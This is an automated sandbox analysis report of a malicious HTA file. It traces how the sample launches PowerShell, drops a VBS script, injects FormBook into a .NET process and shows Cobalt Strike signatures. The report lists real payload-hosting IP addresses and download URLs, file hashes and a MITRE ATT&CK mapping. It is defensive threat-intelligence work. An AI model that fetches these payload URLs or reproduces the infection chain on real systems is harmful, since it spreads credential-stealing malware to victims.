                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.2070222307.0000000001940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.2070222307.0000000001940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting                  		Valid Accounts11
                  Command and Scripting Interpreter                  		111
                  Scripting                  		211
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping21
                  Security Software Discovery                  		Remote Services1
                  Email Collection                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		31
                  Virtualization/Sandbox Evasion                  		LSASS Memory1
                  Process Discovery                  		Remote Desktop Protocol1
                  Archive Collected Data                  		2
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts3
                  PowerShell                  		Logon Script (Windows)Logon Script (Windows)211
                  Process Injection                  		Security Account Manager31
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Deobfuscate/Decode Files or Information                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture13
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                  Obfuscated Files or Information                  		LSA Secrets1
                  File and Directory Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials13
                  System Information Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1566470 Sample: seemebestgoodluckthings.hta Startdate: 02/12/2024 Architecture: WINDOWS Score: 100 47 ip.1016.filemail.com 2->47 49 1016.filemail.com 2->49 57 Suricata IDS alerts for network traffic 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 Antivirus detection for URL or domain 2->61 63 12 other signatures 2->63 10 mshta.exe 1 2->10         started        signatures3 process4 signatures5 67 Suspicious command line found 10->67 69 PowerShell case anomaly found 10->69 13 cmd.exe 1 10->13         started        16 conhost.exe 10->16         started        18 aspnet_compiler.exe 10->18         started        process6 signatures7 79 Detected Cobalt Strike Beacon 13->79 81 Suspicious powershell command line found 13->81 83 Wscript starts Powershell (via cmd or directly) 13->83 85 PowerShell case anomaly found 13->85 20 powershell.exe 3 45 13->20         started        25 conhost.exe 13->25         started        process8 dnsIp9 51 172.245.123.12, 49732, 49739, 80 AS-COLOCROSSINGUS United States 20->51 39 C:\...\seemebestthingsentirelifegivenbac.vbS, Unicode 20->39 dropped 41 C:\Users\user\AppData\...\pdppuoci.cmdline, Unicode 20->41 dropped 65 Loading BitLocker PowerShell Module 20->65 27 wscript.exe 1 20->27         started        30 csc.exe 3 20->30         started        file10 signatures11 process12 file13 71 Detected Cobalt Strike Beacon 27->71 73 Suspicious powershell command line found 27->73 75 Wscript starts Powershell (via cmd or directly) 27->75 77 2 other signatures 27->77 33 powershell.exe 15 16 27->33         started        43 C:\Users\user\AppData\Local\...\pdppuoci.dll, PE32 30->43 dropped 37 cvtres.exe 1 30->37         started        signatures14 process15 dnsIp16 45 ip.1016.filemail.com 142.215.209.77, 443, 49733 HUMBER-COLLEGECA Canada 33->45 53 Writes to foreign memory regions 33->53 55 Injects a PE file into a foreign processes 33->55 signatures17

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  seemebestgoodluckthings.hta16%ReversingLabsScript-WScript.Trojan.Asthma

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://go.StorageJob.cdxml270%Avira URL Cloudsafe
                  http://www.microsoft.co?0%Avira URL Cloudsafe
                  https://go.S0%Avira URL Cloudsafe
                  http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIFC:0%Avira URL Cloudsafe
                  https://1016.filemail.com0%Avira URL Cloudsafe
                  http://crl.microsoftb0%Avira URL Cloudsafe
                  http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIF0%Avira URL Cloudsafe
                  https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5T0%Avira URL Cloudsafe
                  http://172.245.123.12/361/seemeb0%Avira URL Cloudsafe
                  http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIFFT_AdaptivePrinterPort.forma0%Avira URL Cloudsafe
                  https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c100%Avira URL Cloudmalware
                  http://172.245.123.12/361/TELNERA.txt0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ip.1016.filemail.com
                  		142.215.209.77
                  		truetrue
                    		unknown
                    1016.filemail.com
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://172.245.123.12/361/TELNERA.txttrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIFtrue
                      • Avira URL Cloud: safe
                      		unknown
                      https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6ctrue
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1815568460.0000000005B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2034374878.0000000005EF9000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1813925745.0000000004C37000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2034374878.0000000004FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1813925745.0000000004C37000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://go.StorageJob.cdxml27powershell.exe, 00000003.00000002.1812401473.0000000000ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.2034374878.0000000004FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Licensepowershell.exe, 00000007.00000002.2034374878.0000000005EF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIFC:powershell.exe, 00000003.00000002.1816747098.0000000007039000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://contoso.com/Iconpowershell.exe, 00000007.00000002.2034374878.0000000005EF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://1016.filemail.compowershell.exe, 00000007.00000002.2034374878.0000000004FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://go.Spowershell.exe, 00000003.00000002.1812401473.0000000000ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.microsoft.co?powershell.exe, 00000003.00000002.1818468127.000000000808F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.2034374878.0000000004FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tpowershell.exe, 00000007.00000002.2034374878.0000000004FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://172.245.123.12/361/seemebpowershell.exe, 00000003.00000002.1813925745.0000000004F01000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://aka.ms/pscore6lBdqpowershell.exe, 00000003.00000002.1813925745.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2034374878.0000000004E91000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1813925745.0000000004C37000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/powershell.exe, 00000007.00000002.2034374878.0000000005EF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1815568460.0000000005B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2034374878.0000000005EF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.microsoftbpowershell.exe, 00000003.00000002.1818468127.00000000080F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1813925745.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2034374878.0000000004E91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIFFT_AdaptivePrinterPort.formapowershell.exe, 00000003.00000002.1816922583.00000000070FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                142.215.209.77
                                                		ip.1016.filemail.comCanada
                                                		32156HUMBER-COLLEGECAtrue
                                                172.245.123.12
                                                		unknownUnited States
                                                		36352AS-COLOCROSSINGUStrue

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1566470
                                                Start date and time:2024-12-02 09:17:06 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 5m 45s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:13
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:seemebestgoodluckthings.hta
                                                Detection:MAL
                                                Classification:mal100.phis.troj.expl.evad.winHTA@17/16@1/2
                                                EGA Information:
                                                • Successful, ratio: 75%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 39
                                                • Number of non-executed functions: 267
                                                Cookbook Comments:
                                                • Found application associated with file extension: .hta
                                                • Stop behavior analysis, all processes terminated

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target mshta.exe, PID 6592 because there are no executed function
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtCreateKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: seemebestgoodluckthings.hta

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                03:18:01API Interceptor107x Sleep call for process: powershell.exe modified
                                                03:18:35API Interceptor3x Sleep call for process: aspnet_compiler.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                142.215.209.77seemebestthingsgivenmegood.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                  PI-02911202409#.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                    PO#BBGR2411PO69.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                      Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                        Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                          172.245.123.12PI-02911202409#.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                          • 172.245.123.12/361/TELNERA.txt

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          ip.1016.filemail.comseemebestthingsgivenmegood.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                          • 142.215.209.77
                                                          PI-02911202409#.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                          • 142.215.209.77
                                                          PO#BBGR2411PO69.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                          • 142.215.209.77
                                                          Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                          • 142.215.209.77
                                                          Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                          • 142.215.209.77
                                                          0028BGL880-2024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                          • 192.240.97.18

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          AS-COLOCROSSINGUSPI-02911202409#.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                          • 172.245.123.12
                                                          la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                          • 107.175.186.126
                                                          m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 107.174.8.80
                                                          bot.x86_64.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 107.175.32.137
                                                          sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                          • 192.210.142.167
                                                          bot.arm6.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 107.175.32.137
                                                          bot.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 107.175.32.137
                                                          bot.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 107.175.32.137
                                                          bot.arm5.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 107.175.32.137
                                                          bot.ppc.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 107.175.32.137
                                                          HUMBER-COLLEGECAseemebestthingsgivenmegood.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                          • 142.215.209.77
                                                          PI-02911202409#.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                          • 142.215.209.77
                                                          PO#BBGR2411PO69.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                          • 142.215.209.77
                                                          Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                          • 142.215.209.77
                                                          Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                          • 142.215.209.77
                                                          https://www.filemail.com/d/dolcahmytquddazGet hashmaliciousUnknownBrowse
                                                          • 142.215.209.74
                                                          la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                          • 142.214.116.218
                                                          geHxbPNEMi.vbsGet hashmaliciousUnknownBrowse
                                                          • 142.215.209.78
                                                          QUOTATION.xlsGet hashmaliciousHTMLPhisherBrowse
                                                          • 142.215.209.78
                                                          Shipping Document.xlsGet hashmaliciousHTMLPhisherBrowse
                                                          • 142.215.209.78

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          3b5074b1b5d032e5620f69f9f700ff0ehnsdf129.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                          • 142.215.209.77
                                                          RYSUNEK_.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 142.215.209.77
                                                          file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                                          • 142.215.209.77
                                                          seemebestthingsgivenmegood.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                          • 142.215.209.77
                                                          Original CI PL.htmlGet hashmaliciousUnknownBrowse
                                                          • 142.215.209.77
                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                          • 142.215.209.77
                                                          tDLozbx48F.exeGet hashmaliciousGurcu StealerBrowse
                                                          • 142.215.209.77
                                                          sDKRz09zM7.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                          • 142.215.209.77
                                                          5fEYPS3M8Q.exeGet hashmaliciousXWormBrowse
                                                          • 142.215.209.77
                                                          1d5sraR1S1.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 142.215.209.77

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\seemebestthingsentirelifegivenbackwithgood[1].tiff

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (3250), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):153980
                                                          Entropy (8bit):3.8161579842669506
                                                          Encrypted:false
                                                          SSDEEP:3072:MlZ1afy+UshLTPok1alZ1afy+UshLTPokLlZ1afy+UshLTPoks:C+fKsJPBU+fKsJPt+fKsJPI
                                                          MD5:2A35C64DA74E31C6BB2233098EBCAD33
                                                          SHA1:AB084CC1659686A49EB65334623F4845E8FDB9F6
                                                          SHA-256:3C1E1203375F84E0DC74AADD09507C7A0F3ECD5626E6F7D5A917F18246C8F2B9
                                                          SHA-512:399989AD6245A605DD5D435D33A8BFCDCF55B6EB2C159D2944A1168026E555F9A924DC04D2D2E0E6844EF40D212B2A89EA2D30350054B3F4C60A43695B610E35
                                                          Malicious:false
                                                          Preview:...... . . . .....d.W.I.L.W.L.o.W.R.u.A.L.C.x.B. .=. .".z.l.m.k.f.b.W.m.g.u.p.W.h.N.G.".....r.o.T.i.k.l.Z.d.L.W.B.t.G.K.Q. .=. .".a.L.l.e.a.K.k.K.H.c.L.Z.c.c.L.".....f.P.p.x.j.a.N.q.R.H.K.O.t.C.c. .=. .".C.m.g.W.f.P.k.W.R.t.x.g.q.i.s.".........o.c.i.L.N.U.G.z.e.g.K.h.J.P.L. .=. .".G.k.H.h.l.B.K.r.I.c.a.i.b.W.f.".....u.W.i.W.S.L.f.n.l.k.a.i.Z.N.O. .=. .".o.b.I.b.K.J.L.o.L.o.i.N.W.o.i.".....L.B.o.W.f.K.m.W.P.h.c.T.i.c.f. .=. .".G.h.L.K.U.i.u.L.b.n.d.v.a.k.U.".....d.A.i.A.R.R.N.L.Q.L.k.A.m.q.W. .=. .".v.z.b.e.p.U.I.v.c.A.C.b.W.L.t.".....N.a.c.l.R.N.f.u.H.G.x.d.k.U.T. .=. .".j.q.W.G.A.G.L.r.z.l.c.a.j.P.b.".....R.b.d.j.K.c.p.L.z.u.f.q.I.a.U. .=. .".h.P.U.O.e.P.L.h.o.P.h.U.h.n.K.".....T.e.K.a.N.W.S.e.a.d.f.L.q.N.i. .=. .".n.e.v.B.d.m.x.W.O.h.P.L.U.B.B.".....x.m.W.P.A.u.P.f.z.a.a.j.s.U.i. .=. .".p.A.Z.W.h.o.C.L.L.C.L.b.e.I.W.".....K.v.U.C.l.f.e.H.Z.O.s.W.i.n.L. .=. .".z.U.B.o.S.L.G.i.G.k.l.W.i.k.K.".....f.x.l.z.x.L.k.W.G.R.G.W.p.k.C. .=. .".K.c.K.l.u.n.W.W.L.I.G.l.q.Q.B.".....l.x.I.H.o.Z.m.a.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5829
                                                          Entropy (8bit):4.901113710259376
                                                          Encrypted:false
                                                          SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                          MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                          SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                          SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                          SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                          Malicious:false
                                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1144
                                                          Entropy (8bit):5.3306128110270805
                                                          Encrypted:false
                                                          SSDEEP:24:3s0SgSKco4KmZjKbm51s4RPT6moUebIKo+mZ9t7J0gt/NKM9r8Hd:OgSU4xymI4RfoUeW+mZ9tK8NF9u
                                                          MD5:5094DDD5552937A3CE7396DCAA8ECFED
                                                          SHA1:9580113AAE8AD5E1B35F530AF7B5999C3470F962
                                                          SHA-256:33585D3774BAF49B073F90BD4AEC62ABE9507338E085638505D0D7E8D71524BB
                                                          SHA-512:0C8E0B2F065BC539ADCBC581B5C4C8CF80A914786D76E40005C64B1B4CA7B3B712D79D63D565FE9AED2C6AFC56CEA3AEA0A6CB412C6DE35F2EAAC434B722A842
                                                          Malicious:false
                                                          Preview:@...e.................................^..............@..........@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                          C:\Users\user\AppData\Local\Temp\RES6914.tmp

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Dec 2 09:53:56 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1328
                                                          Entropy (8bit):3.96838501183391
                                                          Encrypted:false
                                                          SSDEEP:24:Hje9E2+fyNtbXDfHlfwKEbsmfII+ycuZhNMakSoPNnqSqd:V4tbzFoKPmg1ulMa3QqSK
                                                          MD5:0F02B35D3E34486123EB3949857A6FC1
                                                          SHA1:308276719B9C707403780D5391959E7C48671961
                                                          SHA-256:F29CDC67579EBA8D9A51A932535035F2A66BBC9B3F838BA3583F7A527E386CDA
                                                          SHA-512:1C256133B12539BD1E0CB6AFB10E9FCE142723EDD8095E07963BE354CDD75DCEA46C75D57A81628F54E396B5674C8E4AA7EBCCDD53648804EB78D681A36EC52B
                                                          Malicious:false
